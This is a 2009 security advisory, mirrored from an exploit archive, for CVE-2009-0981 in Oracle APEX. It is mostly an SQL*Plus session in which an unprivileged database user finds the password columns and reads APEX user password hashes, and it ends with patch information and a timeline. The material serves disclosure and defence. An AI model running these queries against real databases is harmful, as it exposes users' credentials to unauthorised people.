Skip to content
cyberexploits
localmultipletext

Oracle APEX 3.2 - Unprivileged DB users can see APEX Password hashes

Oracle APEX 3.2 - Unprivileged DB users can see APEX Password hashes

Published on 2009-04-16

Source code

Pinned to commit 7eac4c3a2ce5
textplatforms/multiple/local/8456.txt7eac4c3a
raw
Unprivileged DB users can see APEX password hashes in FLOWS_030000.WWV_FLOW_USER [CVE-2009-0981]



Name 			Unprivileged DB users can see APEX password hashes in FLOWS_030000.WWV_FLOW_USER [CVE-2009-0981]

Systems Affected 	APEX 3.0 (optional component of 11.1.0.7 installation)

Severity 		High Risk

Category 		Password Disclosure

Vendor URL 		http://www.oracle.com/

Author 			Alexander Kornbrust (ak at red-database-security.com)

CVE 			CVE-2009-0981

Advisory 		14 April 2009 (V 1.00)





Details

Unprivileged database users can see APEX password hashes in FLOWS_030000.WWV_FLOW_USER.

Tested on 11.1.0.7.



C:\> sqlplus dummy/dummy

Connected to:

Oracle Database 11g Enterprise Edition Release 11.1.0.7.0 - Production

With the Partitioning, OLAP, Data Mining and Real Application Testing options



SQL> select granted_role from user_role_privs;



GRANTED_ROLE

------------------------------

CONNECT





SQL> select owner,table_name from all_tables where owner='FLOWS_030000';



OWNER TABLE_NAME

------------------------------ ------------------------------

FLOWS_030000 WWV_FLOW_DUAL100

FLOWS_030000 WWV_FLOW_LOV_TEMP

FLOWS_030000 WWV_FLOW_TEMP_TABLE







Get a list of all columns containing the string "%PASSWORD%'



SQL> select owner||'.'||table_name||'.'||column_name from all_tab_columns where column_name like '%PASSWORD%' and owner like '%FLOWS_0300%';



OWNER||'.'||TABLE_NAME||'.'||COLUMN_NAME

--------------------------------------------------------------------------------

FLOWS_030000.WWV_FLOW_USERS.CHANGE_PASSWORD_ON_FIRST_USE

FLOWS_030000.WWV_FLOW_USERS.FIRST_PASSWORD_USE_OCCURRED

FLOWS_030000.WWV_FLOW_USERS.WEB_PASSWORD_RAW

FLOWS_030000.WWV_FLOW_USERS.WEB_PASSWORD2

FLOWS_030000.WWV_FLOW_USERS.WEB_PASSWORD

FLOWS_030000.WWV_FLOW_USERS.PASSWORD_LIFESPAN_DAYS

FLOWS_030000.WWV_FLOW_USERS.PASSWORD_LIFESPAN_ACCESSES

FLOWS_030000.WWV_FLOW_USERS.PASSWORD_ACCESSES_LEFT

FLOWS_030000.WWV_FLOW_USERS.PASSWORD_DATE



9 rows selected.





SQL> select user_name,web_password2 from FLOWS_030000.WWV_FLOW_USERS



USER_NAME WEB_PASSWORD2

--------------------------------------------------------------------------------

YURI 141FA790354FB6C72802FDEA86353F31



This password hash can be checked using a tool like Repscan.





Patch Information

Apply the patches for Oracle CPU April 2009.





History

13-jan-2009 Oracle published CPU April 2009 [CVE-2009-0981]

14-apr-2009 Oracle published CPU April 2009 [CVE-2009-0981]

14-apr-2009 Advisory published



# milw0rm.com [2009-04-16]

View on GitHub